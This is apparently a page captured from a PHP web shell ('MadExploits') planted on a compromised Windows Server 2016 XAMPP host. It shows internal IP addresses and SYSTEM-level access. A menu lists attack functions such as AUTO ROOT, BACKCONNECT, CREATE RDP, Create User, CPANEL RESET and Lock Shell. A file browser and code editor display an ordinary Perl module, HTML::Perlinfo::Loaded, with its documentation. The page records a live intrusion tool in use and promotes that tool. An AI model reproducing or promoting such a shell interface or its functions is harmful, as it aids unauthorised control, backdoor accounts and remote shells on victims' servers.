Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
perl /
lib /
HTML /
Perlinfo /
[ HOME SHELL ]
Name
Size
Permission
Action
Apache.pm
3.66
KB
-rw-rw-rw-
Base.pm
8.28
KB
-rw-rw-rw-
Common.pm
14
KB
-rw-rw-rw-
General.pm
8.59
KB
-rw-rw-rw-
HTML.pod
7.27
KB
-rw-rw-rw-
Loaded.pm
2.17
KB
-rw-rw-rw-
Modules.pm
28.42
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Loaded.pm
package HTML::Perlinfo::Loaded; BEGIN { %Seen = %INC } use HTML::Perlinfo::Modules; $VERSION = '1.02'; %INC = %Seen; END { delete $INC{'HTML/Perlinfo/Loaded.pm'}; my $m = HTML::Perlinfo::Modules->new(full_page=>0, title=>'perlinfo(INFO_LOADED)'); $m->print_htmlhead; $m->print_modules('files_in'=>[values %INC],'section'=>'Loaded Modules'); print $m->info_variables,"</div></body></html>"; } 1; __END__ =pod =head1 NAME HTML::Perlinfo::Loaded - Post-execution HTML dump of loaded modules and environment variables =head1 SYNOPSIS #!/usr/bin/perl use HTML::Perlinfo::Loaded; ... =head1 DESCRIPTION This module installs an at-exit handler to generate an HTML dump of all the module files used by a Perl program. As an added bonus, environment variables are also included in this dump. When used under mod_perl, the module will show you preloaded modules in the HTML page too. Since the "dump" is a complete HTML page, this module is a good debugging tool for Web applications. Just make sure you print the content-type header beforehand or you will get an internal server error (malformed header). Note that the HTML::Perlinfo function 'perlinfo' has an option called INFO_LOADED that will produce the same result. In other words, there is more than one way to do it! Observe: use HTML::Perlinfo; perlinfo(INFO_LOADED); The result will be the same if you say: #!/usr/bin/perl use HTML::Perlinfo::Loaded; ... There is no difference, except using the perlinfo option gives you greater control. You could always control HTML::Perlinfo::Loaded with a pound sign (a comment on/off), but if you are using mod_perl it makes more sense to add HTML::Perlinfo to your startup file and then call perlinfo(INFO_LOADED) when you want to dump. =head1 SEE ALSO L<Devel::Loaded>, L<HTML::Perlinfo::Modules>, L<HTML::Perlinfo>, L<perlinfo> =head1 AUTHOR Mike Accardo <mikeaccardo@yahoo.com> =head1 COPYRIGHT Copyright (c) 2008, Mike Accardo. All Rights Reserved. This module is free software. It may be used, redistributed and/or modified under the terms of the Perl Artistic License. =cut
Close